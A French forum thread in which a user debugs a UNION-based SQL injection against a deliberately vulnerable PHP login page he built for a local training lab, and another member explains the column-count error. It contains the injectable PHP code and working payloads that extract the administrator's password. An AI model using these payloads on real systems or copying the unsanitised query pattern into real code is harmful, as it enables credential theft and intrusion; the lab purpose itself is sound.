Discussion :

[Severrakh]

Bonjour tout le monde,

J'ai créé un petit site en local pour faire du pentest (un tp d'SQLi pour mon association en ce qui concerne ce petit exercice).
J'ai donc aucun soucis concernant le bypass de login.
Cependant, lorsque je cherche à récupérer des données ou agir sur une table, il y a un soucis.
J'injecte la requête suivante :

Code SQL :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
SELECT * 
FROM users 
WHERE login='zzz' 
UNION 
SELECT passwd 
FROM users 
WHERE login='Administrateur' 
LIMIT 1,1

Et j'ai un retour :

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\test_SQLi\index.php on line 13

Le soucis viens donc pas de mysql_fetch_array() mais du mysql-query qui le précède.

D'après ce que je sais, mysql_query retourne false (et donc valeur booléenne, d'où le soucis) si l'user n'a pas les privilèges pour agir sur la table.

Mon soucis, j'utilise un user au quel j'ai donné la totalité des droits sur toute mes bases de données.

Si quelqu'un a une piste pour régler ce soucis...

[CinePhil]

Il vaut mieux éviter la guerre des étoiles !
En l'occurrence, ici, tu rapatries toutes les colonnes de la table dans la première requête de l'UNION et seulement une colonne dans la seconde donc ça ne peut pas fonctionner.

D'ailleurs, je trouve le sens de la requête bizarre !
Elle signifie, en gros :
"Sélectionner l'utilisateur de login 'zzz' et le mot de passe de l'administrateur."

Concernant le message d'erreur, rien ne dit que ce soit un problème de privilège. Quel utilisateur MySQL l'application utilise t-elle pour se connecter à la BDD ? C'est de cet utilisateur là dont il faut s'occuper des privilèges sur la BDD.

Pour pouvoir analyser le problème, il faudrait donner le code PHP de la connexion à la BDD (en masquant bien sûr le mot de passe et l'URL) et le code de soumission de la requête à MySQL ainsi que le code de son exploitation jusqu'au mysql_fetch-array.

[Severrakh]

Tout d'abord, merci d'avoir rectifié mes erreurs !

Pour le contexte :
Il s'agit d'une exploitation de faille SQL exclusivement en local, je peux donc donner le code php sans soucis.

Ma requête à pour but de récupérer le contenu de la table passwd du login Administrateur.

Voici le code :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
 
if (isset($_GET['login'])) {
 
$db = mysql_connect("localhost","pentest1","*****");  // Connexion à la base de données. (on va masquer le mot de passe pour la forme ! )
            mysql_select_db("pentest1");       // Sélection de la base de données utilisée.
 
$pwd=md5($_GET['pass']);
$sql="SELECT * FROM users WHERE login ='".$_GET['login']." ' AND passwd='".$pwd."';";
echo $sql.'<br/>';
$req=mysql_query($sql)or die(mysql_error());
$data=mysql_fetch_array($req);
if (is_array($data) ) 
{
?>
	Bienvenue <?php echo $data['login']; ?><br/><br/>Cle : <?php echo '"'.$data['key'].'"'; ?>
<?php
}
else
{
echo "LOGIN / PASSWORD INVALIDE <br/>";
?>

Oui, c'est un code bien moche mais c'est le but dans ce contexte ! ^^
Après réflexion, ce n'est pas un soucis de privilège, j'ai ajouter un or die(mysql_error() pour connaitre le soucis.. ça vient au niveau de ma requête SQL.. qui marchait pourtant sur une autre plateforme.

Mon Wamp utilise la version 5.5.24 de MySQL

PS : Merci pour la guerre des étoiles, je ne connaissais absolument pas cette optimisation.

[CinePhil]

?

[Severrakh]

Non, ce n'est pas résolu, je ne vois toujours pas pourquoi ma requête n'est pas exécuté sur cette plateforme.. Ma requête étant pourtant correct il me semble pour ce que je cherche à faire.

[CinePhil]

Symptômes ?
- message d'erreur ?
- pas de résultat en retour ?
- résultat erroné ?

Puisque tu fais un echo $sql, quelle est la requête réellement envoyée ?
Les variables $_GET sont-elles bien valorisées ?

Je vois quand même un petit truc :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

WHERE login ='".$_GET['login']." ' AND

Tu as un espace entre le login et l'apostrophe de fin de chaîne, du coup, si le login réel est 'Severrakh', tu soumets à la requête la recherche du login 'Severrakh ' et il ne trouve pas l'utilisateur !

[Severrakh]

l'echo $sql est :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
$sql="SELECT * FROM users WHERE login ='".$_GET['login']." ' AND passwd='".$pwd."';";

Dans le formulaire j'injecte au niveau du login :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

UNION SELECT passwd FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Dans le but de récupérer le contenu, l'erreur retourné est : The used SELECT statements have a different number of columns.

J'ai donc utilisé :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Dans ce cas j'ai une connexion à la page, sous aucun login et aucun contenu.

Dans le reste des situations essayé j'ai une erreur de syntaxe en rapport avec ma version d'SQL.

Chose étrange étant donné qu'il y a une semaine mon tp fonctionnait, mais sur une autre structure.

Pour les variables GET c'est ok

J'ai réglé pour l'espace avant ' mais je n'avais pas remarqué de soucis sur ce point là.

[CinePhil]

Dans le reste des situations essayé j'ai une erreur de syntaxe en rapport avec ma version d'SQL.

Si je comprends bien, ton exemple du premier message avec l'UNION fonctionne mais tu as d'autres cas qui ne fonctionnent pas ?

[Severrakh]

Pas exactement,

Dans le premier exemple l'erreur retourné est : The used SELECT statements have a different number of columns

Du coup je remplace par :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Et là je n'ai pas d'erreur mais il n'affiche rien..
Et c'est à partir de là que je bloque et tourne en rond.

[CinePhil]

Que donne le résultat du echo $sql ?

[Severrakh]

Code SQL :

Sélectionner tout - Visualiser dans une fenêtre à part

SELECT * FROM users WHERE login ='zzz' UNION SELECT passwd FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;' AND passwd='d41d8cd98f00b204e9800998ecf8427e';

The used SELECT statements have a different number of columns

Voici le retour.
Je coupe la fin de la requête part -- ;
Le hash du pass est affiché dans la requête, mais le but est de récupérer le pass via une requête SQL injecté dans le formulaire .. le echo $sql n'est là qu'à but d'aide.

[CinePhil]

L'erreur est logique, pour la raison que j'ai évoquée dans ma première réponse.

Mais apparemment, tu as essayé aussi autrement :

Du coup je remplace par :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Et là, tu n'as pas d'erreur ? Et quoi ? Une page blanche ?

[Severrakh]

Merci, je viens de voir ce qui allait pas,

ça fonctionne bien mieux avec :

Code sql :

Sélectionner tout - Visualiser dans une fenêtre à part

UNION SELECT passwd,passwd,passwd,passwd FROM users WHERE login='Administrateur'  -- ;

En réfléchissant par la logique je ne pensai pas qu'il remplacerai les affichages de login par le contenu de passwd.
SQL affiche donc le contenu d'une colonne d'un table à la place d'une autre si on le demande de cette manière ?

Merci pour ton aide.

[CinePhil]

Dans une requête UNION, seuls les noms de colonnes de la première requête sont pris en compte pour nommer les colonnes de résultat.

Code SQL :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
SELECT usr_id, usr_login, usr_passwd, usr_key
FROM users
WHERE usr_login = 'zzz'
UNION
SELECT passwd, passwd, passwd, passwd
FROM users
WHERE usr_login = 'Administrateur'
LIMIT 1, 1

=> Résultat :

usr_id	usr_login	usr_passwd	usr_key
1	'Administrateur'	'son_mdp' '12345'

D'une manière générale et dans un cas plus normal de requête, si tu utilises des alias pour nommer les colonnes de résultat, ce n'est pas la peine de répéter les alias sur toutes les requêtes unies :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
SELECT
	col1 AS colonne_1,
	col2 AS colonne_2
FROM une_table
UNION
SELECT
	col3,
	col4
FROM une_autre_table

Le résultat affichera les colonnes "colonne_1" et "colonne_2".